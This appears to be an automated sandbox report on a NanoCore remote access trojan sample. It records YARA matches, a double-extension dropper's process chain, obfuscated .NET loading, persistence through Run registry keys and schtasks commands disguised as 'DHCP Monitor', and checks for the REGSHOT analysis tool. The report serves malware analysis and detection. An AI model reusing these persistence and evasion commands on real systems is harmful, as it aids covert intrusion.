Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 2_2_0037F122
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: String function: 00330DC0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: String function: 0032FD60 appears 40 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: String function: 00CDEC50 appears 56 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: String function: 00CDEB78 appears 39 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: String function: 00CDF5F0 appears 31 times
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_00CC6FAA
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameautoruns.exeL, vs 026910003102350.pdf.scr.exe
Source: 026910003102350.pdf.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
Source: classification engine Classification label: mal100.troj.evad.winEXE@43/44@4/2
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CC6C74 GetLastError,FormatMessageW, 0_2_00CC6C74
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_00CDA6C2
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor
Source: 026910003102350.pdf.scr.exe ReversingLabs: Detection: 46%
Source: 026910003102350.pdf.scr.exe Virustotal: Detection: 45%
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File read: C:\Users\user\Desktop\026910003102350.pdf.scr.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\026910003102350.pdf.scr.exe C:\Users\user\Desktop\026910003102350.pdf.scr.exe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0037194F AdjustTokenPrivileges,CloseHandle, 2_2_0037194F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00371F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 2_2_00371F53
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File created: C:\Users\user\AppData\Local\temp\Folder8_410
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00394089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 2_2_00394089
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00385B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 2_2_00385B27
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0039AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 2_2_0039AFDB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1648:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1880:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Command line argument: sfxname 0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Command line argument: sfxstime 0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Command line argument: STARTDLG 0_2_00CDDF1E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File written: C:\Users\user\AppData\Local\Temp\Folder8_410\laaa.ini
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 026910003102350.pdf.scr.exe Static file information: File size 1064658 > 1048576
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 026910003102350.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 026910003102350.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
Source: 026910003102350.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 026910003102350.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 026910003102350.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 026910003102350.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 026910003102350.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDF640 push ecx; ret 0_2_00CDF653
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Code function: 0_2_00CDEB78 push eax; ret 0_2_00CDEB96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00360332 push edi; ret 2_2_00360333
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00330E06 push ecx; ret 2_2_00330E19
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032DBFA push cs; iretd 2_2_0032DBFD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032DC00 push eax; iretd 2_2_0032DC01
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 2_2_00315D78
Source: 026910003102350.pdf.scr.exe Static PE information: section name: .didat
Source: itugx.exe.0.dr Static PE information: real checksum: 0xe50ad should be: 0xe9063
Source: 026910003102350.pdf.scr.exe Static PE information: real checksum: 0x0 should be: 0x1079dd
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder8_410\__tmp_rar_sfx_access_check_5500781
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 19.2.RegSvcs.exe.d00000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\AppData\Local\Temp\FOLDER~1\Update.vbs
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp"

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
Source: Possible double extension: pdf.scr Static PE information: 026910003102350.pdf.scr.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_003A25A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_003A25A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Code function: 2_2_0032FC8A GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_0032FC8A
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESW
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEQ
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452549594.00000000014CB000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452340975.00000000014C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")#
Source: itugx.exe, 00000017.00000003.533363458.0000000000D07000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.529712010.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534973802.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.536173123.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000002.542096662.0000000000D2A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXED
Source: itugx.exe, 00000002.00000003.386800246.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.410540336.0000000000E0D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400635217.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468989814.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013C4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")<
Source: itugx.exe, 00000010.00000002.470477695.00000000013CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")44V$
Source: itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN?8CJ
Source: itugx.exe, 00000019.00000003.565987603.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.565769789.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.563164824.0000000001959000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000002.569636959.000000000195C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000019.00000003.567142794.000000000195C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE=
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007390000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp, wscript.exe, 0000001B.00000002.537175124.0000025B9CBDF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533720665.0000025B9CBDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ORIGINALFILENAMEAUTORUNS.EXEL,
Source: wscript.exe, 0000001B.00000002.536000753.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000001B.00000003.533357927.0000025B9CBBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: LFILENAMEAUTORUNS.EXEL,
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEL~
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.369716492.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412647234.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENXJ\
Source: itugx.exe, 00000005.00000003.452396525.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455207897.00000000014D1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.450945660.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451302859.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451585020.00000000014D1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN-
